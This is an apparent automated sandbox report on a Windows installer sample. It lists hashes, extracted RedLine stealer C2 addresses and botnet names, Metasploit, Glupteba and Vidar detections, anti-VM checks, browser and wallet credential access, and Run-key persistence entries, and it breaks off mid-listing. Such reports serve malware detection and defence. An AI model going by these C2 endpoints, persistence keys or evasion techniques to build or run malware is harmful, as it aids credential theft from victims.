Resubmissions
15-10-2024 15:36
241015-s1zlzasdkc 1001-07-2024 18:32
240701-w6yteawhmq 1001-07-2024 14:52
240701-r82wmaxdnd 1001-07-2024 14:52
240701-r8syqa1dpp 1011-03-2024 21:22
240311-z8dsssgg58 1001-09-2021 13:18
210901-5bmxjspa5s 1001-09-2021 13:04
210901-te4btfspqa 1001-09-2021 05:12
210901-4wnkwm1p3j 1031-08-2021 21:47
210831-41rp97dma2 1031-08-2021 19:51
210831-359awwatje 10Analysis
-
max time kernel
1216s -
max time network
1808s -
platform
windows11_x64 -
resource
win11 -
submitted
01-09-2021 13:04
Static task
static1
Behavioral task
behavioral1
Sample
Setup (15).exe
Resource
win11
Behavioral task
behavioral2
Sample
Setup (18).exe
Resource
win11
Behavioral task
behavioral3
Sample
Setup (6).exe
Resource
win11
Behavioral task
behavioral4
Sample
Setup (7).exe
Resource
win11
Behavioral task
behavioral5
Sample
Setup (8).exe
Resource
win11
Behavioral task
behavioral6
Sample
Setup (9).exe
Resource
win11
Behavioral task
behavioral7
Sample
Setup.exe
Resource
win11
General
-
Target
Setup (7).exe
-
Size
631KB
-
MD5
cb927513ff8ebff4dd52a47f7e42f934
-
SHA1
0de47c02a8adc4940a6c18621b4e4a619641d029
-
SHA256
fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f
-
SHA512
988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c
Malware Config
Extracted
redline
bratanchikAYE
45.14.49.232:63850
Extracted
metasploit
windows/single_exec
Extracted
redline
NORMAN2
45.14.49.184:27587
Signatures
-
Glupteba Payload 1 IoCs
resource yara_rule behavioral4/memory/3804-294-0x0000000004750000-0x0000000005076000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6280 2996 rundll32.exe 171 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6092 2996 rUNdlL32.eXe 171 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 8520 2996 rundll32.exe 171 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 10 IoCs
resource yara_rule behavioral4/files/0x000100000002b1ee-191.dat family_redline behavioral4/files/0x000100000002b1ee-238.dat family_redline behavioral4/memory/492-324-0x0000000000000000-mapping.dmp family_redline behavioral4/memory/492-326-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral4/memory/5436-372-0x0000000000000000-mapping.dmp family_redline behavioral4/memory/2300-418-0x0000000000000000-mapping.dmp family_redline behavioral4/memory/2108-421-0x0000000000000000-mapping.dmp family_redline behavioral4/memory/3492-417-0x0000000000000000-mapping.dmp family_redline behavioral4/memory/5260-480-0x0000000000000000-mapping.dmp family_redline behavioral4/memory/4900-479-0x0000000000000000-mapping.dmp family_redline -
Suspicious use of NtCreateProcessExOtherParentProcess 64 IoCs
description pid Process procid_target PID 4332 created 2052 4332 WerFault.exe 95 PID 948 created 2376 948 Setup.exe 104 PID 492 created 2000 492 T1vR4WrDcDSogjCwBQvMGbKr.exe 96 PID 4684 created 828 4684 WerFault.exe 189 PID 3060 created 552 3060 Process not Found 394 PID 468 created 3804 468 WerFault.exe 105 PID 5284 created 1872 5284 WerFault.exe 654 PID 3988 created 4556 3988 WerFault.exe 887 PID 1608 created 4900 1608 WerFault.exe 173 PID 5644 created 472 5644 1EdD3teN6KkB5VqAYDo5FDa6.exe 251 PID 6596 created 6364 6596 WerFault.exe 210 PID 5376 created 7124 5376 WerFault.exe 229 PID 1288 created 1620 1288 Process not Found 199 PID 4136 created 7128 4136 WerFault.exe 246 PID 1496 created 5572 1496 WerFault.exe 185 PID 1924 created 1860 1924 WerFault.exe 159 PID 8432 created 5728 8432 PING.EXE 151 PID 8848 created 9088 8848 WerFault.exe 316 PID 8980 created 8840 8980 WerFault.exe 304 PID 9040 created 8704 9040 WerFault.exe 671 PID 9024 created 1192 9024 WerFault.exe 324 PID 3712 created 4088 3712 WerFault.exe 317 PID 9540 created 5632 9540 WerFault.exe 318 PID 9508 created 5524 9508 s6XkU3VdWErp3FIa9CIA2Ojx.exe 375 PID 9756 created 8908 9756 WerFault.exe 332 PID 9616 created 6604 9616 WerFault.exe 421 PID 7912 created 9484 7912 WerFault.exe 365 PID 10156 created 8564 10156 WerFault.exe 311 PID 1500 created 8688 1500 msedge.exe 308 PID 10176 created 5540 10176 WerFault.exe 241 PID 9128 created 4880 9128 s6XkU3VdWErp3FIa9CIA2Ojx.exe 1281 PID 7260 created 7620 7260 WerFault.exe 263 PID 5976 created 5028 5976 T1vR4WrDcDSogjCwBQvMGbKr.exe 451 PID 840 created 7756 840 WerFault.exe 469 PID 2312 created 7232 2312 WerFault.exe 276 PID 1916 created 9788 1916 WerFault.exe 480 PID 9472 created 8260 9472 WerFault.exe 702 PID 10252 created 8300 10252 WerFault.exe 399 PID 1416 created 5764 1416 WerFault.exe 588 PID 9652 created 8124 9652 WerFault.exe 424 PID 3028 created 10008 3028 T1vR4WrDcDSogjCwBQvMGbKr.exe 785 PID 10844 created 10816 10844 WerFault.exe 614 PID 4068 created 7832 4068 Process not Found 617 PID 7492 created 10036 7492 WerFault.exe 525 PID 8996 created 8104 8996 WerFault.exe 664 PID 3836 created 6376 3836 WerFault.exe 707 PID 2576 created 1288 2576 msedge.exe 1172 PID 3956 created 9656 3956 WerFault.exe 730 PID 816 created 10160 816 WerFault.exe 761 PID 8848 created 7336 8848 WerFault.exe 776 PID 10172 created 10284 10172 WerFault.exe 789 PID 7320 created 6500 7320 T1vR4WrDcDSogjCwBQvMGbKr.exe 802 PID 4156 created 1332 4156 WerFault.exe 807 PID 8268 created 4448 8268 WerFault.exe 833 PID 10912 created 7680 10912 WerFault.exe 924 PID 8240 created 12728 8240 7noQoxsVgLBBtgcZWelnZEHN.exe 1321 PID 13032 created 13120 13032 WerFault.exe 874 PID 12964 created 12796 12964 WerFault.exe 1101 PID 4004 created 10484 4004 s6XkU3VdWErp3FIa9CIA2Ojx.exe 933 PID 9300 created 7300 9300 lBobHeUIxCiZQkJ8azQApo1T.exe 957 PID 4400 created 7100 4400 T1vR4WrDcDSogjCwBQvMGbKr.exe 1304 PID 4940 created 14292 4940 WerFault.exe 952 PID 4720 created 13352 4720 WerFault.exe 955 PID 2600 created 1032 2600 WerFault.exe 967 -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 1 IoCs
resource yara_rule behavioral4/memory/472-548-0x00000000007E0000-0x00000000008B3000-memory.dmp family_vidar -
Downloads MZ/PE file
-
Executes dropped EXE 64 IoCs
pid Process 4556 xsh_JRTNhnaSsr0N0iyGUKJl.exe 828 oVqZpEClc7pin1vVFpe44nxh.exe 2248 P16ofDXrRIjcgmlh_CM6ho3M.exe 3212 s6XkU3VdWErp3FIa9CIA2Ojx.exe 908 xsX_K9gzdoPQHq2lB6Th8U3h.exe 472 GGUYxB8IdnvmZwODT1wxOWma.exe 716 Gn6IQGGC247F9azIFetpAORy.exe 552 cM775w5s6FbQBcukhv8b0GUT.exe 1080 6E9Hd52_WGEiBxNWxEs12YEN.exe 1096 7ErLa0RFLI6vyU7MyTq31upS.exe 1872 vcgP_3juGzHeGgIt97Ec6H6N.exe 1896 sm9PYHfj18WU6helQ6bqJ_DZ.exe 2000 zQV5DgrHRg2FoIip1FWqVRwo.exe 2052 hXs7V6wVyEQwn1KTElchP9EQ.exe 2432 EKn_OVLBdja5sVWvxioG1V7M.exe 2468 T1vR4WrDcDSogjCwBQvMGbKr.exe 2352 7noQoxsVgLBBtgcZWelnZEHN.exe 3804 oa2u56KuFk2i7XYMA0xMSNi2.exe 2376 6HArcFNxuMLRyOVZuW33yZTr.exe 2080 aSdNRGGOPzOtSyZMA8ci1a65.exe 920 qYR4nzypVyFJN472kUDHVHqD.exe 4448 wPt6bm7uNglQB6DC0fWJlmim.exe 3352 pS1lAs69AU4dP7M5ZxgsPSZ4.exe 3168 yS9T56oZWXoqJTlZbDPY26ud.exe 3356 inst001.exe 2644 cutm3.exe 1548 md8_8eus.exe 3372 yS9T56oZWXoqJTlZbDPY26ud.tmp 1752 7noQoxsVgLBBtgcZWelnZEHN.exe 948 Setup.exe 5076 s6XkU3VdWErp3FIa9CIA2Ojx.exe 5064 s6XkU3VdWErp3FIa9CIA2Ojx.exe 492 T1vR4WrDcDSogjCwBQvMGbKr.exe 5168 s6XkU3VdWErp3FIa9CIA2Ojx.exe 5548 J77cmUgJX0OQi4nZtiqUPG2L.exe 5572 2729210.exe 5752 7388481.exe 5736 KRkNvH~YgUUt9O.exE 5728 2118516.exe 6060 7noQoxsVgLBBtgcZWelnZEHN.exe 5296 7noQoxsVgLBBtgcZWelnZEHN.exe 6136 4047125.exe 5436 T1vR4WrDcDSogjCwBQvMGbKr.exe 5636 s6XkU3VdWErp3FIa9CIA2Ojx.exe 5244 4718977.exe 5220 1EdD3teN6KkB5VqAYDo5FDa6.exe 5252 7noQoxsVgLBBtgcZWelnZEHN.exe 5400 9840432e051a6fa1192594db02b80a4c1fd73456.exe 5516 s6XkU3VdWErp3FIa9CIA2Ojx.exe 5524 s6XkU3VdWErp3FIa9CIA2Ojx.exe 1860 1378248.exe 5876 1EdD3teN6KkB5VqAYDo5FDa6.exe 2524 LivelyScreenRecS3.0.exe 3492 s6XkU3VdWErp3FIa9CIA2Ojx.exe 2300 T1vR4WrDcDSogjCwBQvMGbKr.exe 2108 7noQoxsVgLBBtgcZWelnZEHN.exe 5300 note866.exe 2892 stats.exe 5260 T1vR4WrDcDSogjCwBQvMGbKr.exe 4900 s6XkU3VdWErp3FIa9CIA2Ojx.exe 4432 7noQoxsVgLBBtgcZWelnZEHN.exe 3572 s6XkU3VdWErp3FIa9CIA2Ojx.exe 828 7noQoxsVgLBBtgcZWelnZEHN.exe 5820 T1vR4WrDcDSogjCwBQvMGbKr.exe -
Checks BIOS information in registry 2 TTPs 8 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion sm9PYHfj18WU6helQ6bqJ_DZ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion sm9PYHfj18WU6helQ6bqJ_DZ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7noQoxsVgLBBtgcZWelnZEHN.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7noQoxsVgLBBtgcZWelnZEHN.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wfIV8jV52oMTs8swOrJDTUfg.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion wfIV8jV52oMTs8swOrJDTUfg.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7ErLa0RFLI6vyU7MyTq31upS.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7ErLa0RFLI6vyU7MyTq31upS.exe -
Loads dropped DLL 12 IoCs
pid Process 3372 yS9T56oZWXoqJTlZbDPY26ud.tmp 3372 yS9T56oZWXoqJTlZbDPY26ud.tmp 3572 s6XkU3VdWErp3FIa9CIA2Ojx.exe 3572 s6XkU3VdWErp3FIa9CIA2Ojx.exe 6364 rundll32.exe 5400 9840432e051a6fa1192594db02b80a4c1fd73456.exe 7124 rundll32.exe 5400 9840432e051a6fa1192594db02b80a4c1fd73456.exe 5400 9840432e051a6fa1192594db02b80a4c1fd73456.exe 9336 L0CqMRweDWlOuC5qBSMsI5gb.tmp 9336 L0CqMRweDWlOuC5qBSMsI5gb.tmp 7756 rundll32.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral4/files/0x000100000002b1f3-177.dat themida behavioral4/files/0x000100000002b1ef-181.dat themida behavioral4/files/0x000100000002b1ef-218.dat themida behavioral4/files/0x000100000002b1f3-215.dat themida behavioral4/memory/1096-296-0x0000000000E70000-0x0000000000E71000-memory.dmp themida behavioral4/memory/1896-312-0x00000000002F0000-0x00000000002F1000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 5 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce tmp89D2_tmp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" tmp89D2_tmp.exe Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftEdgeAutoLaunch_5EFC0ECB77A7585FE9DCDD0B2E946A2B = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --no-startup-window /prefetch:5" msedge.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 7388481.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA sm9PYHfj18WU6helQ6bqJ_DZ.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 7noQoxsVgLBBtgcZWelnZEHN.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA wfIV8jV52oMTs8swOrJDTUfg.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md8_8eus.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA note866.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 7ErLa0RFLI6vyU7MyTq31upS.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 13 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 116 ipinfo.io 216 ipinfo.io 254 ipinfo.io 384 ipinfo.io 586 ipinfo.io 21 ipinfo.io 1 ip-api.com 86 ipinfo.io 89 ipinfo.io 134 ipinfo.io 187 ipinfo.io 391 ipinfo.io 1 ipinfo.io -
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
pid Process 1096 7ErLa0RFLI6vyU7MyTq31upS.exe 1896 sm9PYHfj18WU6helQ6bqJ_DZ.exe 8672 7noQoxsVgLBBtgcZWelnZEHN.exe 8832 wfIV8jV52oMTs8swOrJDTUfg.exe -
Suspicious use of SetThreadContext 64 IoCs
description pid Process procid_target PID 2468 set thread context of 492 2468 T1vR4WrDcDSogjCwBQvMGbKr.exe 134 PID 2468 set thread context of 5436 2468 T1vR4WrDcDSogjCwBQvMGbKr.exe 142 PID 3212 set thread context of 3492 3212 s6XkU3VdWErp3FIa9CIA2Ojx.exe 169 PID 2468 set thread context of 2300 2468 T1vR4WrDcDSogjCwBQvMGbKr.exe 170 PID 2352 set thread context of 2108 2352 7noQoxsVgLBBtgcZWelnZEHN.exe 168 PID 2468 set thread context of 5260 2468 T1vR4WrDcDSogjCwBQvMGbKr.exe 172 PID 3212 set thread context of 4900 3212 s6XkU3VdWErp3FIa9CIA2Ojx.exe 173 PID 2352 set thread context of 4432 2352 7noQoxsVgLBBtgcZWelnZEHN.exe 180 PID 2352 set thread context of 828 2352 7noQoxsVgLBBtgcZWelnZEHN.exe 189 PID 2468 set thread context of 5820 2468 T1vR4WrDcDSogjCwBQvMGbKr.exe 192 PID 3212 set thread context of 1228 3212 s6XkU3VdWErp3FIa9CIA2Ojx.exe 191 PID 2352 set thread context of 3128 2352 7noQoxsVgLBBtgcZWelnZEHN.exe 208 PID 3212 set thread context of 5316 3212 s6XkU3VdWErp3FIa9CIA2Ojx.exe 207 PID 2468 set thread context of 580 2468 T1vR4WrDcDSogjCwBQvMGbKr.exe 204 PID 3212 set thread context of 6304 3212 s6XkU3VdWErp3FIa9CIA2Ojx.exe 201 PID 2352 set thread context of 6296 2352 7noQoxsVgLBBtgcZWelnZEHN.exe 202 PID 2468 set thread context of 6460 2468 T1vR4WrDcDSogjCwBQvMGbKr.exe 209 PID 2352 set thread context of 6912 2352 7noQoxsVgLBBtgcZWelnZEHN.exe 216 PID 2468 set thread context of 6972 2468 T1vR4WrDcDSogjCwBQvMGbKr.exe 225 PID 3212 set thread context of 6772 3212 s6XkU3VdWErp3FIa9CIA2Ojx.exe 217 PID 3212 set thread context of 1516 3212 s6XkU3VdWErp3FIa9CIA2Ojx.exe 238 PID 2468 set thread context of 1716 2468 T1vR4WrDcDSogjCwBQvMGbKr.exe 227 PID 3212 set thread context of 6840 3212 s6XkU3VdWErp3FIa9CIA2Ojx.exe 235 PID 2468 set thread context of 3024 2468 T1vR4WrDcDSogjCwBQvMGbKr.exe 230 PID 2352 set thread context of 4848 2352 7noQoxsVgLBBtgcZWelnZEHN.exe 243 PID 3212 set thread context of 1908 3212 s6XkU3VdWErp3FIa9CIA2Ojx.exe 242 PID 3212 set thread context of 6496 3212 s6XkU3VdWErp3FIa9CIA2Ojx.exe 253 PID 2352 set thread context of 7128 2352 7noQoxsVgLBBtgcZWelnZEHN.exe 246 PID 2468 set thread context of 4168 2468 T1vR4WrDcDSogjCwBQvMGbKr.exe 252 PID 3212 set thread context of 7420 3212 s6XkU3VdWErp3FIa9CIA2Ojx.exe 260 PID 2352 set thread context of 7656 2352 7noQoxsVgLBBtgcZWelnZEHN.exe 262 PID 2468 set thread context of 7920 2468 T1vR4WrDcDSogjCwBQvMGbKr.exe 268 PID 2352 set thread context of 8072 2352 7noQoxsVgLBBtgcZWelnZEHN.exe 272 PID 2468 set thread context of 4164 2468 T1vR4WrDcDSogjCwBQvMGbKr.exe 278 PID 2352 set thread context of 1108 2352 7noQoxsVgLBBtgcZWelnZEHN.exe 281 PID 3212 set thread context of 3608 3212 s6XkU3VdWErp3FIa9CIA2Ojx.exe 283 PID 2468 set thread context of 4572 2468 T1vR4WrDcDSogjCwBQvMGbKr.exe 282 PID 908 set thread context of 2972 908 xsX_K9gzdoPQHq2lB6Th8U3h.exe 287 PID 2468 set thread context of 7852 2468 T1vR4WrDcDSogjCwBQvMGbKr.exe 288 PID 3212 set thread context of 7868 3212 s6XkU3VdWErp3FIa9CIA2Ojx.exe 286 PID 2352 set thread context of 3132 2352 7noQoxsVgLBBtgcZWelnZEHN.exe 285 PID 3212 set thread context of 3412 3212 s6XkU3VdWErp3FIa9CIA2Ojx.exe 291 PID 2468 set thread context of 5472 2468 T1vR4WrDcDSogjCwBQvMGbKr.exe 289 PID 2352 set thread context of 6932 2352 7noQoxsVgLBBtgcZWelnZEHN.exe 290 PID 2468 set thread context of 2512 2468 T1vR4WrDcDSogjCwBQvMGbKr.exe 294 PID 3212 set thread context of 4540 3212 s6XkU3VdWErp3FIa9CIA2Ojx.exe 297 PID 2352 set thread context of 8220 2352 7noQoxsVgLBBtgcZWelnZEHN.exe 295 PID 2468 set thread context of 8468 2468 T1vR4WrDcDSogjCwBQvMGbKr.exe 300 PID 3212 set thread context of 8528 3212 s6XkU3VdWErp3FIa9CIA2Ojx.exe 310 PID 2352 set thread context of 8768 2352 7noQoxsVgLBBtgcZWelnZEHN.exe 303 PID 2468 set thread context of 8952 2468 T1vR4WrDcDSogjCwBQvMGbKr.exe 315 PID 3212 set thread context of 8284 3212 s6XkU3VdWErp3FIa9CIA2Ojx.exe 321 PID 2352 set thread context of 8460 2352 7noQoxsVgLBBtgcZWelnZEHN.exe 335 PID 3212 set thread context of 5760 3212 s6XkU3VdWErp3FIa9CIA2Ojx.exe 352 PID 2468 set thread context of 8940 2468 T1vR4WrDcDSogjCwBQvMGbKr.exe 341 PID 3212 set thread context of 9408 3212 s6XkU3VdWErp3FIa9CIA2Ojx.exe 354 PID 2468 set thread context of 9688 2468 T1vR4WrDcDSogjCwBQvMGbKr.exe 359 PID 2352 set thread context of 9712 2352 7noQoxsVgLBBtgcZWelnZEHN.exe 358 PID 3212 set thread context of 9948 3212 s6XkU3VdWErp3FIa9CIA2Ojx.exe 368 PID 8476 set thread context of 10192 8476 1EdD3teN6KkB5VqAYDo5FDa6.exe 362 PID 2468 set thread context of 8824 2468 T1vR4WrDcDSogjCwBQvMGbKr.exe 363 PID 9080 set thread context of 9480 9080 lBobHeUIxCiZQkJ8azQApo1T.exe 367 PID 3212 set thread context of 9484 3212 s6XkU3VdWErp3FIa9CIA2Ojx.exe 365 PID 2352 set thread context of 9844 2352 7noQoxsVgLBBtgcZWelnZEHN.exe 374 -
Drops file in Program Files directory 33 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\SmartPDF\SmartPDF\PBrowFile15.exe Setup.exe File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe uUfuwMR7FnjkfGmGGtYHszFQ.exe File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe uUfuwMR7FnjkfGmGGtYHszFQ.exe File opened for modification C:\Program Files (x86)\SmartPDF\SmartPDF\d note866.exe File opened for modification C:\Program Files (x86)\SmartPDF\SmartPDF\d.jfm note866.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\Uninstall.exe aSdNRGGOPzOtSyZMA8ci1a65.exe File created C:\Program Files (x86)\Company\NewProduct\Uninstall.ini aSdNRGGOPzOtSyZMA8ci1a65.exe File opened for modification C:\Program Files (x86)\SmartPDF\SmartPDF\9840432e051a6fa1192594db02b80a4c1fd73456.exe Setup.exe File opened for modification C:\Program Files (x86)\SmartPDF\SmartPDF\lg.exe Setup.exe File created C:\Program Files (x86)\Company\NewProduct\tmp.edb md8_8eus.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\d.INTEG.RAW md8_8eus.exe File created C:\Program Files (x86)\Company\NewProduct\d.jfm md8_8eus.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\d.jfm md8_8eus.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\inst001.exe aSdNRGGOPzOtSyZMA8ci1a65.exe File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe Gn6IQGGC247F9azIFetpAORy.exe File opened for modification C:\Program Files (x86)\SmartPDF\SmartPDF\LivelyScreenRecS3.0.exe Setup.exe File opened for modification C:\Program Files (x86)\SmartPDF\SmartPDF\note866.exe Setup.exe File opened for modification C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe Setup.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\cutm3.exe aSdNRGGOPzOtSyZMA8ci1a65.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe aSdNRGGOPzOtSyZMA8ci1a65.exe File created C:\Program Files (x86)\SmartPDF\SmartPDF\Uninstall.ini Setup.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\d md8_8eus.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\inst001.exe bUFOtZhRCMl30Z0yUWpuMSRk.exe File created C:\Program Files (x86)\SmartPDF\SmartPDF\d note866.exe File created C:\Program Files (x86)\SmartPDF\SmartPDF\d.jfm note866.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\cutm3.exe bUFOtZhRCMl30Z0yUWpuMSRk.exe File opened for modification C:\Program Files (x86)\SmartPDF\SmartPDF\Visit.url Setup.exe File created C:\Program Files (x86)\Company\NewProduct\d md8_8eus.exe File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe Gn6IQGGC247F9azIFetpAORy.exe File opened for modification C:\Program Files (x86)\SmartPDF\SmartPDF\Uninstall.exe Setup.exe File opened for modification C:\Program Files (x86)\SmartPDF\SmartPDF\d.INTEG.RAW note866.exe File created C:\Program Files (x86)\SmartPDF\SmartPDF\tmp.edb note866.exe File opened for modification C:\Program Files (x86)\SmartPDF\SmartPDF\9840432e051a6fa1192594db02b80a4c1fd73456.exe Setup.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 64 IoCs
pid pid_target Process procid_target 3104 2376 WerFault.exe 104 2572 2000 WerFault.exe 96 2996 2052 WerFault.exe 95 1092 828 WerFault.exe 83 1560 4556 WerFault.exe 84 1640 4900 WerFault.exe 173 424 472 WerFault.exe 91 7076 6364 WerFault.exe 210 3608 7124 WerFault.exe 229 6628 1620 WerFault.exe 199 7600 7128 WerFault.exe 246 5004 5572 WerFault.exe 185 8448 1860 WerFault.exe 159 8992 5728 WerFault.exe 151 7524 5728 WerFault.exe 151 1772 9088 WerFault.exe 316 9860 8908 WerFault.exe 332 7784 9484 WerFault.exe 365 9612 8564 WerFault.exe 311 5564 8688 WerFault.exe 308 8744 5540 WerFault.exe 241 10036 5540 WerFault.exe 241 6184 5028 WerFault.exe 451 6632 7620 WerFault.exe 263 8176 7620 WerFault.exe 263 8704 7756 WerFault.exe 469 4520 7232 WerFault.exe 276 9380 7232 WerFault.exe 276 10544 9788 WerFault.exe 480 8708 8260 WerFault.exe 377 9792 8300 WerFault.exe 399 7684 5764 WerFault.exe 588 9344 8124 WerFault.exe 424 4820 10008 WerFault.exe 431 4904 10816 WerFault.exe 614 9720 7832 WerFault.exe 617 4436 10036 WerFault.exe 525 9132 8104 WerFault.exe 664 5152 6376 WerFault.exe 539 5272 1288 WerFault.exe 729 3064 9656 WerFault.exe 730 5788 10160 WerFault.exe 761 5388 7336 WerFault.exe 776 10492 10284 WerFault.exe 789 1312 6500 WerFault.exe 802 4832 1332 WerFault.exe 807 6268 4448 WerFault.exe 833 5040 7680 WerFault.exe 849 12912 12728 WerFault.exe 871 13292 13120 WerFault.exe 874 7332 12796 WerFault.exe 880 7752 10484 WerFault.exe 896 9264 7300 WerFault.exe 919 13444 7100 WerFault.exe 935 14064 14292 WerFault.exe 952 14132 13352 WerFault.exe 955 13872 1032 WerFault.exe 967 14284 10536 WerFault.exe 988 14068 13016 WerFault.exe 1000 1268 12252 WerFault.exe 1022 13896 13640 WerFault.exe 1037 13928 5288 WerFault.exe 1053 14300 13496 WerFault.exe 1079 12848 9800 WerFault.exe 1134 -
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString schtasks.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision s6XkU3VdWErp3FIa9CIA2Ojx.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 5074643.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Process not Found Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision schtasks.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried 